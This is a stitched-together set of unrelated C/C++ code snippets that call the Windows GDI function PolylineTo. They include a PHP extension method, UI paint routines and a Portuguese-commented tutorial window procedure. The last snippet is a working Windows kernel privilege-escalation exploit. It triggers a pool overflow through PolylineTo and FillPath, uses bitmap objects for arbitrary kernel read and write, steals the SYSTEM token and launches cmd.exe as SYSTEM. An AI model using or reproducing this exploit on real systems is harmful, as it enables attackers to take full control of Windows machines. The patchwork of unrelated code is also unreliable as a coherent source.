PHP_METHOD(WinGdiPath, lineTo)
{
wingdi_devicecontext_object *dc_obj;
wingdi_path_object *path_obj;
zval ***parameters,
**x, **y;
POINT *points = NULL;
DWORD points_total = 0;
int param_count, i;
WINGDI_ERROR_HANDLING();
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "+", ¶meters, ¶m_count) == FAILURE)
return;
WINGDI_RESTORE_ERRORS();
path_obj = zend_object_store_get_object(getThis() TSRMLS_CC);
dc_obj = zend_object_store_get_object(path_obj->device_context TSRMLS_CC);
points = emalloc(param_count * sizeof(POINT));
for (i = 0; i < param_count; i++)
{
// We expect only arrays
if (Z_TYPE_PP(parameters[i]) != IS_ARRAY)
{
php_error_docref(NULL TSRMLS_CC, E_ERROR, "expected array for parameter %d, got %s",
i + 1, zend_zval_type_name(*(parameters[i])));
goto CLEANUP;
}
else
{
// We want 2 elements
if (zend_hash_num_elements(Z_ARRVAL_PP(parameters[i])) != 2)
{
php_error_docref(NULL TSRMLS_CC, E_ERROR,
"expected 2 elements for array at parameter %d, got %d",
i + 1, zend_hash_num_elements(Z_ARRVAL_PP(parameters[i])));
goto CLEANUP;
}
else
{
zend_hash_index_find(Z_ARRVAL_PP(parameters[i]), 0, (void **)&x);
zend_hash_index_find(Z_ARRVAL_PP(parameters[i]), 1, (void **)&y);
if (Z_TYPE_PP(x) != IS_LONG) convert_to_long(*x);
if (Z_TYPE_PP(y) != IS_LONG) convert_to_long(*y);
points[i].x = Z_LVAL_PP(x);
points[i].y = Z_LVAL_PP(y);
points_total++;
}
}
}
RETVAL_BOOL(PolylineTo(dc_obj->hdc, points, points_total));
CLEANUP:
efree(points);
}
void CDateBanner::CRightArrowButton::PaintForeground(HDC dc, int w, int h)
{
DWORD lc1 = c1;
DWORD lc2 = c2;
DWORD lc3 = c3;
DWORD blk = 0;
DWORD dash = dashColor;
if(m_state & ButtonMouseOver)
{
SetDCPenColor(dc, hiliteFill);
SetDCBrushColor(dc, hiliteFill);
Rectangle(dc, 1, 1, w - 1, h - 1);
if(m_state & ButtonPressed)
{
lc1 = lc2 = lc3 = blk;
dash = hiliteDash;
}
}
SetDCPenColor(dc, dash);
MoveToEx(dc, 2, 2, 0);
POINT pts[] = { { w - 2, 2 }, { w - 2, h - 2 }, { 2, h - 2 }, { 2, 2 } };
PolylineTo(dc, pts, 4);
HPEN p2 = CreatePen(PS_DASH, 2, lc3);
HGDIOBJ oldPen = SelectObject(dc, p2);
MoveToEx(dc, 5, 5, 0);
LineTo(dc, 15, 20);
LineTo(dc, 5, 35);
HPEN p1 = CreatePen(PS_DASH, 2, lc2);
SelectObject(dc, p1);
DeleteObject(p2);
MoveToEx(dc, 5, 10, 0);
LineTo(dc, 25, 20);
LineTo(dc, 5, 30);
p2 = CreatePen(PS_DASH, 2, lc1);
SelectObject(dc, p2);
DeleteObject(p1);
MoveToEx(dc, 5, 15, 0);
LineTo(dc, 35, 20);
LineTo(dc, 5, 25);
SelectObject(dc, oldPen);
DeleteObject(p2);
}
LRESULT CWindow::OnPaint(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
PAINTSTRUCT ps;
CHAR szText[] = "TestString²âÊÔ×Ö·û´®";
static POINT pt[] = { { 100, 10 }, { 100, 100 }, { 10, 100 }, { 10, 10 } };
BeginPaint(hWnd, &ps);
TextOutA(ps.hdc, 0, 10, szText, sizeof(szText) - 1);
MoveToEx(ps.hdc, pt[countof(pt) - 1].x, pt[countof(pt) - 1].y, NULL);
PolylineTo(ps.hdc, pt, countof(pt));
EndPaint(hWnd, &ps);
return ERROR_SUCCESS;
}
//--------------------------------------------------------------------------
// WindowProc() -> Processa as mensagens enviadas para o programa
//--------------------------------------------------------------------------
LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
// Variáveis para manipulação da parte gráfica do programa
HDC hDC = NULL;
PAINTSTRUCT psPaint;
// Canetas e pincéis
HPEN hPen = NULL;
HPEN hPenOld = NULL;
HBRUSH hBrush = NULL;
HBRUSH hBrushOld = NULL;
// Verifica qual foi a mensagem enviada
switch(uMsg)
{
case WM_CREATE: // Janela foi criada
{
// Retorna 0, significando que a mensagem foi processada corretamente
return(0);
} break;
case WM_PAINT: // Janela (ou parte dela) precisa ser atualizada
{
// Obtém identificador do DC e preenche PAINTSTRUCT
hDC = BeginPaint(hWnd, &psPaint);
// Cria e seleciona nova caneta no DC e salva caneta antiga
hPen = CreatePen(PS_SOLID, 1, RGB(255, 0, 0));
hPenOld = (HPEN)SelectObject(hDC, hPen);
// Move “cursor invisível” para (100, 100)
MoveToEx(hDC, 100, 100, NULL);
// Desenha quatro retas, formando um losango
LineTo(hDC, 70, 120);
LineTo(hDC, 100, 140);
LineTo(hDC, 130, 120);
LineTo(hDC, 100, 100);
// Define pontos do losango
POINT ptLosango[4];
ptLosango[0].x = 20;
ptLosango[0].y = 70;
ptLosango[1].x = 50;
ptLosango[1].y = 90;
ptLosango[2].x = 80;
ptLosango[2].y = 70;
ptLosango[3].x = 50;
ptLosango[3].y = 50;
// Move “cursor invisível” para (50, 50)
MoveToEx(hDC, 50, 50, NULL);
// Desenha quatro retas formadas pelos pontos do vetor ptLosango[4],
// formando o losango
PolylineTo(hDC, ptLosango, 4);
// Restaura caneta antiga e deleta nova caneta
SelectObject(hDC, hPenOld);
DeleteObject(hPen);
// Libera DC e valida área
EndPaint(hWnd, &psPaint);
return(0);
} break;
case WM_CLOSE: // Janela foi fechada
{
// Destrói a janela
DestroyWindow(hWnd);
return(0);
} break;
case WM_DESTROY: // Janela foi destruída
{
// Envia mensagem WM_QUIT para o loop de mensagens
PostQuitMessage(0);
return(0);
} break;
default: // Outra mensagem
{
/* Deixa o Windows processar as mensagens que não foram verificadas na função */
return(DefWindowProc(hWnd, uMsg, wParam, lParam));
}
}
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k=0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++){
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
SetAddress(addr1);
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}
